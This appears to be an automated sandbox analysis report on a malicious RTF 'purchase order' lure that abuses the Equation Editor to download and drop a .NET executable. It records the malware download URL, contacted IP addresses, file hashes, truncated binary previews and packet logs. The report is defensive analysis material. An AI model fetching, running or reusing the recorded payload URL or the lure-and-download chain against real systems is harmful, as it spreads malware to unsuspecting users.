                                                                                PO2008095.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Order List.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                DHL Original Documents.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Purchase Order List.xlsmGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                img_Especificaci#U00f3n_07102021.docGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Purchase Order_0190.doc__.rtfGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PO. 2100002.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                04OCT2021-USD-178,750.00.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                TT remittance.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                TT form.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                04OCT2021-USD-178,750.00.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                especificaci#U00f3n 0021.docGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                RF Quotation_04102021.docGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                SteelTrading PO-5579.xlsx.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                IMG_PO-000120741.docGet hashmaliciousBrowse
                                                                                • 149.154.167.220

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:downloaded
                                                                                Size (bytes):486912
                                                                                Entropy (8bit):6.778690362170083
                                                                                Encrypted:false
                                                                                SSDEEP:12288:SEIG72hsEtDtc2gksrW6p8/PNvX3ivqINRb:EKoDtFFsrE/VP3ivqINRb
                                                                                MD5:BC5F0AA0262021DB5921D726F7A5B820
                                                                                SHA1:B41245E3BBFC8A7905BFC56B88EA79975595F4F6
                                                                                SHA-256:B227A0AE42AA451635BCE6E3D50A05D895A3B6FA479B6882A548721A38091F25
                                                                                SHA-512:A62ABA917BE2EEC67B82CF15A09EC34F8BB2D94098C0674858081B6B075E10E1195DB1947CAD445FFEBF4503BFAAD55EFF861DE93B81BBFB57163B7592E9C114
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                IE Cache URL:http://palangavra.lt/jukiestay/gufoxqa.exe
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H...........X.......\....E...b..........................................Ivan Medvedev...2~'....(....*..(....*2~5....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*R~;....(.....{......*..{....*"..}....*..{....*"..}....*..{....*"..}....*.~>...~<....(....r.E.p~=....(....(....*..{....*"..}....*..{....*"..}....*N.(....~?.....(....*..{....*"..}....*.~>...~@....(....r.E.p~B...r.F.p~A....(.....d...(....(....*>..(O.....}....*>.{.....{....Zl*>..(O.....}....*f.{.....{....Zl#.-
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4877C7E7-A321-4438-A27A-0B7C6E560902}.tmp
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2560
                                                                                Entropy (8bit):2.8100989291245866
                                                                                Encrypted:false
                                                                                SSDEEP:24:IrpyUcwqII99iCDYNR6roVgJReOUyOoX6S66QLsQlNbOa4ZXk/cub505unG:IFyYjI/asJReKOof41b7iZuG
                                                                                MD5:2BDACAB3747178F7E0A6F4D7A31F6D11
                                                                                SHA1:C437C2836EAA2A00BBBA64EC08E0BB40FE4478C8
                                                                                SHA-256:3C1F78FABA6BDA5501E0019283F0D25EA06A379B24D2E8C1CA790B6749A08D89
                                                                                SHA-512:E388641848DDE78678FA3E5F089F66D0AFE7EAE6F19950BBF944D2F4A7144A4F2339990A95A13B6FC241575ECD43E8337FABA23A9255972E452CD27BDB043A3F
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: -.@.#.+.+.`.5.9.8...?.6...[.?...?.!.).7.[.=.(.+.(.*.../.*.9.1.%.6.[.%.9.!.|.8.:.=.`.;.%.^.$.*.?.#.;.'.*.6.[.1.3.)._.<.#.'...^.&...#.~.&.,._.2.(./.;.4.0.?.5...../.,.;.@.^.%.0.-.^.^.-.<.6.7.*.0.8.&./.5.<.;.[.~./.=.$.5.&.3.:.*.%.`.1...5.$.-.>.[.*.?.-.8.`.9.5.?./.'.%...7.(.<.5.1.@...#.^.?.3.!.[.!.'.'.9.%.%.%.~.?.].?.9.!.|.%.3.*.0.+.[...2.?.?.0.).+.|.-.&._.&.(.%...0.:.%.0...4.%.+.4.[.-...?.-.3.6.%.-.8.'.?...).?...-.=.).2.!.0...[.6...9.+.1...=.7.0.<.`.%...+.4.`.>.#.(...9.#.2.?.^.3.-.5.>.2.=.0.,._.`.@.#.#.?.<.5.,.).1.5.<.&...0.~./.%.[.%.0.,.,.$.+./.).8.+...8.9.3.?.^.'.1.:.1.3.=.)...!.(.?...`...+.,.?.2.<.4.-.>.`.(.?...5..._...>.~._...2.8.@.|.'.4.7.].3.%.].=.1.%.?.#.6.1...?.).(.;.~.9.#.>...@.%.0.).!.=.(.3.,.8.[.2.$.#.;.-.>.-.9.8.0.#.+./.'.?.(.....9.7.9.~...).-.@.=.[.@.4.0...?.[...3.?.1.2.4.@.?.~.&.(.7.9.#.;.3.1._._.].6.>.^.'.+.7.5.?.]...+.#.3.6.,.^.@.@.=.~.2.7.<.7.|.?.+.#.|.`...*.,.6.7.|.!.%.!.%./.,.?.$.,.9.?.:.]...9.<.=.4...+.#.9.1.).@.3.*.-...7.>.].#.*.2.-.?.>.!.?.(.[.@.:.~.].$.*.~.2...*.1.~.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmp
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1024
                                                                                Entropy (8bit):0.05390218305374581
                                                                                Encrypted:false
                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase Order_0131021.LNK
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Thu Oct 14 16:22:13 2021, length=15658, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):1074
                                                                                Entropy (8bit):4.525345332508347
                                                                                Encrypted:false
                                                                                SSDEEP:24:8CQ/XTTc+b+QROsdeoZROsiDv3qHwqE/7Eg:8n/XTA+y+OMLOmHTWB
                                                                                MD5:5553B96A2ED8B4558BACEB47D38C1748
                                                                                SHA1:70A0DA9820F6E3C5E755B8BD90B20705058049F0
                                                                                SHA-256:03E1FC72B2CDD61EBC996E5C2F95D4785502F121B329015D72F3B4597FDA7271
                                                                                SHA-512:2EE72D13C088478A3AE2CE0122586228C2A4BEB0C9CBE54008FF7334ECC25E50AB8D347D36EDF6ABAE9ACAA3D14748FAA1BF710A2AC17934D756E7A9693E0C81
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: L..................F.... .....>.....>...=... ...*=...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2.*=..NS. .PURCHA~1.DOC..b.......S...S..*.........................P.u.r.c.h.a.s.e. .O.r.d.e.r._.0.1.3.1.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\579569\Users.user\Desktop\Purchase Order_0131021.doc.1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.u.r.c.h.a.s.e. .O.r.d.e.r._.0.1.3.1.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......579569....
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):95
                                                                                Entropy (8bit):4.77019537852511
                                                                                Encrypted:false
                                                                                SSDEEP:3:bDuMJlt34qxpulmX1aWN4qxpulv:bCmoopuPNopu1
                                                                                MD5:AD3C75BA1EBB2EB0F34E5EDABE1344B8
                                                                                SHA1:EC8A7EADE69E7CB6FA86D3ACC021470E8186E57B
                                                                                SHA-256:84A877A95B14C0E7DDE0A99EB2BF9E56BC85130998E5F2DC3BBF6E4D47AF6F8F
                                                                                SHA-512:462AE39D68A4D7A498C2AE2E7AF1C8AEDFC83D0C4A858E86C6A58E44973D8152B89864B3F8049E6E65E3CC695EF29F5A73D46D280507550CA4AFDF8FA6CAB3D1
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: [folders]..Templates.LNK=0..Purchase Order_0131021.LNK=0..[doc]..Purchase Order_0131021.LNK=0..
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.5038355507075254
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2
                                                                                Entropy (8bit):1.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:Qn:Qn
                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: ..
                                                                                C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):486912
                                                                                Entropy (8bit):6.778690362170083
                                                                                Encrypted:false
                                                                                SSDEEP:12288:SEIG72hsEtDtc2gksrW6p8/PNvX3ivqINRb:EKoDtFFsrE/VP3ivqINRb
                                                                                MD5:BC5F0AA0262021DB5921D726F7A5B820
                                                                                SHA1:B41245E3BBFC8A7905BFC56B88EA79975595F4F6
                                                                                SHA-256:B227A0AE42AA451635BCE6E3D50A05D895A3B6FA479B6882A548721A38091F25
                                                                                SHA-512:A62ABA917BE2EEC67B82CF15A09EC34F8BB2D94098C0674858081B6B075E10E1195DB1947CAD445FFEBF4503BFAAD55EFF861DE93B81BBFB57163B7592E9C114
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Reputation:low
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H...........X.......\....E...b..........................................Ivan Medvedev...2~'....(....*..(....*2~5....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*R~;....(.....{......*..{....*"..}....*..{....*"..}....*..{....*"..}....*.~>...~<....(....r.E.p~=....(....(....*..{....*"..}....*..{....*"..}....*N.(....~?.....(....*..{....*"..}....*.~>...~@....(....r.E.p~B...r.F.p~A....(.....d...(....(....*>..(O.....}....*>.{.....{....Zl*>..(O.....}....*f.{.....{....Zl#.-
                                                                                C:\Users\user\Desktop\~$rchase Order_0131021.doc
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.5038355507075254
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                Malicious:false
                                                                                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                Static File Info

                                                                                General

                                                                                File type:Rich Text Format data, unknown version
                                                                                Entropy (8bit):3.45414279609642
                                                                                TrID:
                                                                                • Rich Text Format (5005/1) 55.56%
                                                                                • Rich Text Format (4004/1) 44.44%
                                                                                File name:Purchase Order_0131021.doc
                                                                                File size:15658
                                                                                MD5:fc66be4a9696798aff0be8ed97bd294f
                                                                                SHA1:cf158b670ec831531a233d41872d1a9ee3850ff1
                                                                                SHA256:8ad456fc82b1c617f362b0356e6273ca6952368d3478f3f11c55e7c968158a15
                                                                                SHA512:3d68cde4050df2c0b519a237cd122176c7dcbeb8fb93bbdd6d3caa06ffa1fa37c2357822bf0d4f8d76c21050bd303e9d483dc76566c5b5f08ca72c226e56eb2d
                                                                                SSDEEP:384:U/RZbKkaCb3iWkAqF3UuUh/kIkBWsHDvu:UDbKkaOjkX3UuicZMF
                                                                                File Content Preview:{\rtf3212-@#++`598.?6.[?.?!)7[=(+(*./*91%6[%9!|8:=`;%^$*?#;'*6[13)_<#'.^&.#~&,_2(/;40?5../,;@^%0-^^-<67*08&/5<;[~/=$5&3:*%`1.5$->[*?-8`95?/'%.7(<51@.#^?3![!''9%%%~?]?9!|%3*0+[.2??0)+|-&_&(%.0:%0.4%+4[-.?-36%-8'?.)?.-=)2!0.[6.9+1.=70<`%.+4`>#(.9#2?^3-5>2=0

                                                                                File Icon

                                                                                Icon Hash:e4eea2aaa4b4b4a4

                                                                                Static RTF Info

                                                                                Objects

                                                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                00000033Bhno
                                                                                1000002F8hno

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                10/14/21-10:24:56.289135UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 14, 2021 10:22:59.049212933 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.071090937 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.071178913 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.071497917 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.093384981 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.100934982 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101012945 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101016045 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101056099 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101078987 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101115942 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101130962 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101166010 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101185083 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101238966 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101269007 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101285934 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101289034 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101325989 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101342916 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101380110 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101458073 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101511002 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.101537943 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.101578951 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.110775948 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123496056 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123564959 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123619080 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123620033 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123667955 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123675108 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123676062 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123725891 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123728991 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123778105 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123780966 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123828888 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123831034 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123872995 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123892069 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123939037 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123944998 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.123989105 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.123995066 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124041080 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124047041 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124090910 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124097109 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124140978 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124145985 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124191046 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124197960 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124241114 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124247074 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124288082 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124305964 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124349117 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124360085 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124383926 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124396086 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124411106 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124453068 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124461889 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124505043 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.124519110 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.124561071 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.125000954 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146296978 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146351099 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146385908 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146388054 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146419048 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146425962 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146425962 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146476984 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146478891 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146513939 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146521091 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146552086 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146558046 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146589994 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146605968 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146636963 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146642923 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146680117 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146688938 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146717072 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146728992 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146754980 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146768093 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146794081 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146801949 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146830082 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146845102 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146867037 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146879911 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146904945 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146919012 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146951914 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.146953106 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.146996021 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147001982 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147032976 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147042990 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147072077 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147089005 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147109985 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147130013 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147173882 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147185087 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147211075 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147245884 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147273064 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147291899 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147315025 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147330046 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147361040 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147361994 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147404909 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147412062 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147440910 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147449017 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147480011 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147483110 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147520065 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147524118 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147557020 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147564888 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.147594929 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.147602081 CEST4916780192.168.2.22144.76.47.167
